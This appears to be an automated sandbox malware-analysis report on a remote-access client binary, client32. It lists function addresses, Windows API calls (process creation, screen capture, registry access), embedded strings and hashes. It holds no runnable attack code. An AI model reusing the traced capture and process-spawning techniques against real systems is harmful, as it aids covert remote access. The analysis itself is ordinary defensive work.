                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                                                                                                                • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                                                                                                                • API String ID: 3945178471-2526036698
                                                                                                                                                                                • Opcode ID: b6c218d212d3c8cb5806940ab8483b69e4edd05323a10dc2146f8a977af78a49
                                                                                                                                                                                • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                                                                                                                • Opcode Fuzzy Hash: b6c218d212d3c8cb5806940ab8483b69e4edd05323a10dc2146f8a977af78a49
                                                                                                                                                                                • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                                                                                                                Function 1100D690 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 80processCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                                                                                                                  • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                                                                                                                  • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                                                                                                                • _strrchr.LIBCMT ref: 1100D6EF
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                                                                                                                • wsprintfA.USER32 ref: 1100D720
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_strrchrwsprintf
                                                                                                                                                                                • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                                                • API String ID: 892740911-4146734959
                                                                                                                                                                                • Opcode ID: 4fd05ca803908bc7ca3a051177fa9deb72138ec6c88e9c066d92db7fe3320ca8
                                                                                                                                                                                • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd05ca803908bc7ca3a051177fa9deb72138ec6c88e9c066d92db7fe3320ca8
                                                                                                                                                                                • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                                                                                                                Function 1111B3F0 Relevance: 16.7, APIs: 11, Instructions: 157windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1111B47C
                                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 1111B48E
                                                                                                                                                                                • BitBlt.GDI32(?,?,00000000,00000000,?,?,00000000,00000000,00CC0020), ref: 1111B4C9
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1111B4DA
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111B503
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111B52E
                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 1111B540
                                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 1111B553
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1111B56D
                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,00000000,?,?,?,00000000,00CC0020), ref: 1111B5A7
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1111B5B8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$Select$Delete$BitmapCompatibleCreate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2345580825-0
                                                                                                                                                                                • Opcode ID: 79b28d9cfe3a2e80a94aa4f3bbac006a78633c0519ecd3b4f3a0e4eeb8147462
                                                                                                                                                                                • Instruction ID: ea17e7cf44a0b050778b540cf281e41c003104085927d4ba746e12c19d705b56
                                                                                                                                                                                • Opcode Fuzzy Hash: 79b28d9cfe3a2e80a94aa4f3bbac006a78633c0519ecd3b4f3a0e4eeb8147462
                                                                                                                                                                                • Instruction Fuzzy Hash: 93514FB5A40609AFDB14DFB4D988FAFF7F9FB48304F104569E96A97244CA70B940CB60
                                                                                                                                                                                Function 110572DF Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 398registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1105733D
                                                                                                                                                                                  • Part of subcall function 1101B7A0: LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 110577BE
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 11057851
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 11057CDA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$InitializeLibraryLoadUninitialize__wcstoi64
                                                                                                                                                                                • String ID: CLTCONN.CPP$Client$DisableSecurity$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                • API String ID: 2138175088-358189543
                                                                                                                                                                                • Opcode ID: 0eb55bd9accfdbeeb58ae611690ba2ab7a20be997196e3928cbbfa05b79c4e1b
                                                                                                                                                                                • Instruction ID: b4ee171d6d780f5dacbf8a316c73507a0f4d58aa79c9c471e408d527cb48be1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0eb55bd9accfdbeeb58ae611690ba2ab7a20be997196e3928cbbfa05b79c4e1b
                                                                                                                                                                                • Instruction Fuzzy Hash: B902053594016A9FCB65DB54CD94FDDB3B8BF48204F1082DAE51AA7241EB30AF89CF94
                                                                                                                                                                                Function 11121560 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 301COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 1112166B
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • _memmove.LIBCMT ref: 11121707
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageObjectProcessStock_memmovewsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$charwidths
                                                                                                                                                                                • API String ID: 3617616990-267608605
                                                                                                                                                                                • Opcode ID: 25032759fdb775cce5e3dc97edee18544accf5fd3235984ce81d216dbffa4e75
                                                                                                                                                                                • Instruction ID: 188d9440c827c0b679d04f9d8c33f72ddb710db07bc88ebae7273a76800d021b
                                                                                                                                                                                • Opcode Fuzzy Hash: 25032759fdb775cce5e3dc97edee18544accf5fd3235984ce81d216dbffa4e75
                                                                                                                                                                                • Instruction Fuzzy Hash: 23C160F5E002299BDB24CF64CD80BD9F7B9AB44308F5441E9E60DA7241EB716E84CF59
                                                                                                                                                                                Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1104147B
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00010446,?,00000002,00002710,?), ref: 11041670
                                                                                                                                                                                • _free.LIBCMT ref: 11041677
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                                                                                                                • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                • API String ID: 1897251511-2352888828
                                                                                                                                                                                • Opcode ID: 1f1af45b871cae715dbb5fce96896374ccec3fc92e2ae18206a19c360aa718e0
                                                                                                                                                                                • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f1af45b871cae715dbb5fce96896374ccec3fc92e2ae18206a19c360aa718e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                                                                                                                Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                                                                                                                • API String ID: 536389180-1339850372
                                                                                                                                                                                • Opcode ID: b2317e1fab14cc1e9ae5e65bb0eda81e48a640c4fcbed9ceb2a9fcf29a7ff80e
                                                                                                                                                                                • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                                                                                                                • Opcode Fuzzy Hash: b2317e1fab14cc1e9ae5e65bb0eda81e48a640c4fcbed9ceb2a9fcf29a7ff80e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                                                                                                                Function 111076E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                                                                                                                • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                                                                                                                • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                                • API String ID: 3891031082-3311166593
                                                                                                                                                                                • Opcode ID: 4a73a97e79fe4d41e46ca8673c3717c23941d22203db016d09999afa265f6c45
                                                                                                                                                                                • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a73a97e79fe4d41e46ca8673c3717c23941d22203db016d09999afa265f6c45
                                                                                                                                                                                • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                                                                                                                Function 1111F530 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GdiFlush.GDI32 ref: 1111F54C
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1111F560
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1111F56D
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1111F577
                                                                                                                                                                                • _free.LIBCMT ref: 1111F5B8
                                                                                                                                                                                • CreateDIBSection.GDI32(?,00000000,00000000,?,00000000,00000000), ref: 1111F624
                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1111F654
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$Select$CreateDeleteErrorFlushLastSection_free
                                                                                                                                                                                • String ID: ($Error deleting membm, e=%d
                                                                                                                                                                                • API String ID: 1242465738-1932779903
                                                                                                                                                                                • Opcode ID: d5346ceee0b29eb1f95e1463beb1259c19c4cdc3654a47dcbddcc57a46a169f3
                                                                                                                                                                                • Instruction ID: ea6deb8a5b51ca8231794afaf8ff326f3f1a998182940b222ce6d21925b08371
                                                                                                                                                                                • Opcode Fuzzy Hash: d5346ceee0b29eb1f95e1463beb1259c19c4cdc3654a47dcbddcc57a46a169f3
                                                                                                                                                                                • Instruction Fuzzy Hash: F741D3B5A01205ABDB04DFA4DDD8BAAF7B8FF48318F144278ED199F285D734A900CB60
